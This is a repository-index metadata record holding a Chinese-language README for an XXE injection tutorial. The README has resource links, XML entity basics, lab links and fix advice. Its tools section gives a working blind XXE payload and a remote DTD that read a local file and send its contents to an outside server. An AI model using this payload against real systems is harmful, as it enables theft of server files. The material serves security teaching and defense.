{"id":19123434,"url":"https://github.com/astteam/xxe","last_synced_at":"2026-01-30T15:32:33.712Z","repository":{"id":224341223,"uuid":"317377418","full_name":"ASTTeam/XXE","owner":"ASTTeam","description":"《Web安全教程之XXE漏洞》XML External Entity Injection.","archived":false,"fork":false,"pushed_at":"2025-11-01T10:27:54.000Z","size":482,"stargazers_count":10,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-11-01T12:14:47.290Z","etag":null,"topics":["0e0w","astteam","getshell","xxe"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ASTTeam.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-12-01T00:04:15.000Z","updated_at":"2025-11-01T10:27:58.000Z","dependencies_parsed_at":"2025-01-03T22:31:22.315Z","dependency_job_id":null,"html_url":"https://github.com/ASTTeam/XXE","commit_stats":null,"previous_names":["astteam/xxe"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ASTTeam/XXE","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ASTTeam%2FXXE","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ASTTeam%2FXXE/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ASTTeam%2FXXE/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ASTTeam%2FXXE/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ASTTeam","download_url":"https://codeload.github.com/ASTTeam/XXE/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ASTTeam%2FXXE/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28914905,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-30T12:13:43.263Z","status":"ssl_error","status_checked_at":"2026-01-30T12:13:22.389Z","response_time":66,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0e0w","astteam","getshell","xxe"],"created_at":"2024-11-09T05:25:38.811Z","updated_at":"2026-01-30T15:32:33.703Z","avatar_url":"https://github.com/ASTTeam.png","language":null,"readme":"# 《深入理解WEB漏洞之XXE漏洞》\n\n本项目用来收集整理XXE漏洞的相关内容，包括XXE的利用方法工具或思路等。XXE漏洞往往不可以执行命令，但可以通过文件读取方法获取敏感信息，之后进一步Getshell！作者：[0e0w](https://github.com/0e0w)\n\n本项目创建于2022年3月3日，最近的一次更新时间为2024年3月1日。本项目会持续更新，直到海枯石烂！\n\n- [01-XXE漏洞资源]()\n- [02-XXE漏洞基础]()\n- [03-XXE漏洞工具]()\n- [04-XXE渗透测试]()\n- [05-XXE代码审计]()\n- [06-XXE漏洞赏金]()\n- [07-XXE漏洞修复]()\n\n## 01-XXE漏洞资源\n\n- https://github.com/topics/XXE\n- https://github.com/topics/XXE\n- https://github.com/search?q=XXE\n\n一、XXE书籍资源\n\n二、XXE培训演讲\n\n三、XXE其他资源\n- https://github.com/payloadbox/xxe-injection-payload-list\n- https://github.com/omurugur/XXE_Payload_List\n- https://github.com/trapp3rhat/XXE-injections\n- https://github.com/HLOverflow/XXE-study\n- https://github.com/deanf1/dotnet-security-unit-tests\n- https://github.com/OlivierLaflamme/Auditing-Vulnerabilities\n- https://github.com/samuel-knutson/dotnet-xxe-learning-tests\n- https://github.com/hannoch/python-xxe\n- https://github.com/mrpinghe/xxe-file-enum\n- https://github.com/mprechtl/information-leakage\n- https://github.com/rootz491/xxe-castor\n- https://github.com/FrancescoDiSalesGithub/XXE-gen\n- https://github.com/omurugur/Oracle_CTF_Web_XML_Entity_Exploit\n- https://github.com/Wh1t3Fox/xxe.page\n- https://github.com/magnus-longva-bouvet/xxe-demo\n- https://github.com/yeeyeeweb/XXEER\n- https://github.com/BuffaloWill/oxml_xxe\n- https://github.com/TheTwitchy/xxer\n- https://github.com/staaldraad/xxeserv\n- https://github.com/AonCyberLabs/xxe-recursive-download\n- https://github.com/joernchen/xxeserve\n- https://github.com/ssexxe/XXEBugFind\n- https://github.com/hackping/XXEpayload\n- https://github.com/GoSecure/xxe-workshop\n- https://github.com/ropnop/xxetimes\n- https://github.com/Gifts/XXE-OOB-Exploitation-Toolset-for-Automation\n- https://github.com/muttiopenbts/kisskissie\n- https://github.com/SpiderMate/B-XSSRF\n- https://github.com/vulnspy/phpaudit-XXE\n- https://github.com/RihaMaheshwari/XXE-Injection-Payloads\n- https://github.com/lc/230-OOB\n- https://github.com/D4Vinci/XOE\n- https://github.com/LandGrey/xxe-ftp-server\n- https://github.com/vp777/metahttp\n- https://github.com/incredibleindishell/XXE_Vulnerable_codes\n- https://github.com/tjcim/xxefr\n- https://github.com/sry309/XXE-Payload\n- https://github.com/keven1z/XXEDemo\n- https://github.com/Maskhe/xxeDemo\n- https://github.com/d1y1n/xxetester\n- https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html\n- https://hdivsecurity.com/owasp-xml-external-entities-xxe\n- https://vk9-sec.com/xml-external-entity-xxe-injection\n- https://www.secpulse.com/archives/178950.html\n- https://www.freebuf.com/articles/web/332419.html\n- https://www.secpulse.com/archives/189161.html\n- https://tttang.com/archive/1813\n- https://xz.aliyun.com/t/13355\n\n## 02-XXE漏洞基础\n\n一、XXE漏洞概念（XML External Entity Injection）\n\n- 什么是XML？\n\n  - XML由3个部分构成，它们分别是：文档类型定义（Document Type Definition，DTD），即XML的布局语言；可扩展的样式语言（Extensible Style Language，XSL），即XML的样式表语言；以及可扩展链接语言（Extensible Link Language，XLL）。\n\n- 四种实体？\n\n  - **内置实体**\n    \n    | 实体 | 实体引用 | 含义              |\n    | ---- | -------- | ----------------- |\n    | lt   | \u0026lt;     | \u003c（小于号）       |\n    | gt   | \u0026gt;     | \u003e（大于号）       |\n    | amp  | \u0026amp;    | \u0026（“and”符）      |\n    | apos | \u0026apos;   | '（撇号或单引号） |\n  | quot | \u0026quot;   | \"（双引号）       |\n    \n  - **字符实体**\n  - **通用实体**\n  - **参数实体**\n\n- 什么是XXE漏洞？\n\n  - XXE（XML外部实体注入，XML External Entity) ，在应用程序解析XML输入时，当允许引用外部实体时，可构造恶意内容，导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。.\n\n- XXE漏洞分类？\n  - OOB XXE：有回显\n  - Blind XXE：无回显\n\n三、XXE漏洞原理\n\n四、XXE漏洞危害\n\n五、XXE漏洞思考\n\n- XXE漏洞如何执行系统命令？\n- Blind XXE 如何读取敏感文件？\n- XXE漏洞最大可以读取多少字节的文件？\n- XXE和XML注入的区别？\n\n## 03-XXE漏洞工具\n\n- 如何开发一个XXE渗透测试和代码审计的工具？\n\n一、XXE payload\n\n- Blind XXE 读取文件\n\n```\n\u003c?xml version=\"1.0\" ?\u003e\n\u003c!DOCTYPE any[\n\u003c!ENTITY % file SYSTEM \"file://c://Windows//win.ini\"\u003e\n\u003c!ENTITY % remote SYSTEM \"http://10.126.168.53/h.dtd\"\u003e\n%remote;\n%send;\n]\u003e\n\u003cfoo\u003e\u003c/foo\u003e\n```\n\n```\n// 在服务器中创建此文件，文件名称为h.dtd。通过日志查看读取到的文件内容\n\u003c!ENTITY % ppp \"\u003c!ENTITY \u0026#x25; send SYSTEM 'http://10.126.168.53/?ccc=%file;'\u003e\"\u003e\n%ppp;\n```\n\n二、XXE被动扫描\n\n三、待整理\n- https://github.com/GoSecure/dtd-finder\n- https://github.com/luisfontes19/xxexploiter\n- https://github.com/enjoiz/XXEinjector\n- https://github.com/suanve/xxeserver\n- https://github.com/whitel1st/docem\n\n## 04-XXE渗透测试\n\n一、XXE漏洞挖掘\n\n- 如何挖掘XXE漏洞？\n- XXE漏洞经常出现的位置？\n\n二、XXE漏洞实战\n\n三、XXE高级利用\n\n## 05-XXE代码审计\n\n一、XXE漏洞靶场\n\n- https://github.com/c0ny1/xxe-lab\n- https://github.com/keven1z/XXEDemo\n- https://github.com/jbarone/xxelab\n- https://github.com/brandonprry/vulnerable_xxe\n- https://github.com/TheTwitchy/vulnd_xxe\n- https://github.com/eileencodes/security_examples\n\n二、XXE审计原理\n\n三、XXE危险函数\n\n- 在PHP中：\n- 在Java中：\n- 在.NET中：\n\n四、XXE漏洞分析\n\n- https://github.com/jas502n/CVE-2019-2888\n- https://github.com/jamieparfet/Apache-OFBiz-XXE\n- https://github.com/Wfzsec/Weblogic-XXE-poc\n\n## 06-XXE漏洞赏金\n\n- https://github.com/HoneTeam/XXE\n\n## 07-XXE漏洞修复\n\n- 方案一：使用开发语言提供的禁用外部实体的方法\n  - PHP：\n    1. libxml_disable_entity_loader设置为TRUE来禁用外部实体\n  - Java：\n    1. DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();\n    2. dbf.setExpandEntityReferences(false);\n  - Python：\n    1. from lxml import etree\n    2. xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))\n- 方案二：过滤用户提交的XML数据\n  - 过滤关键词：\u003c!DOCTYPE和\u003c!ENTITY，或者SYSTEM和PUBLIC。\n\n## 08-XXE参考资源\n\n- https://github.com/ASTTeam/XXE","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fastteam%2Fxxe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fastteam%2Fxxe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fastteam%2Fxxe/lists"}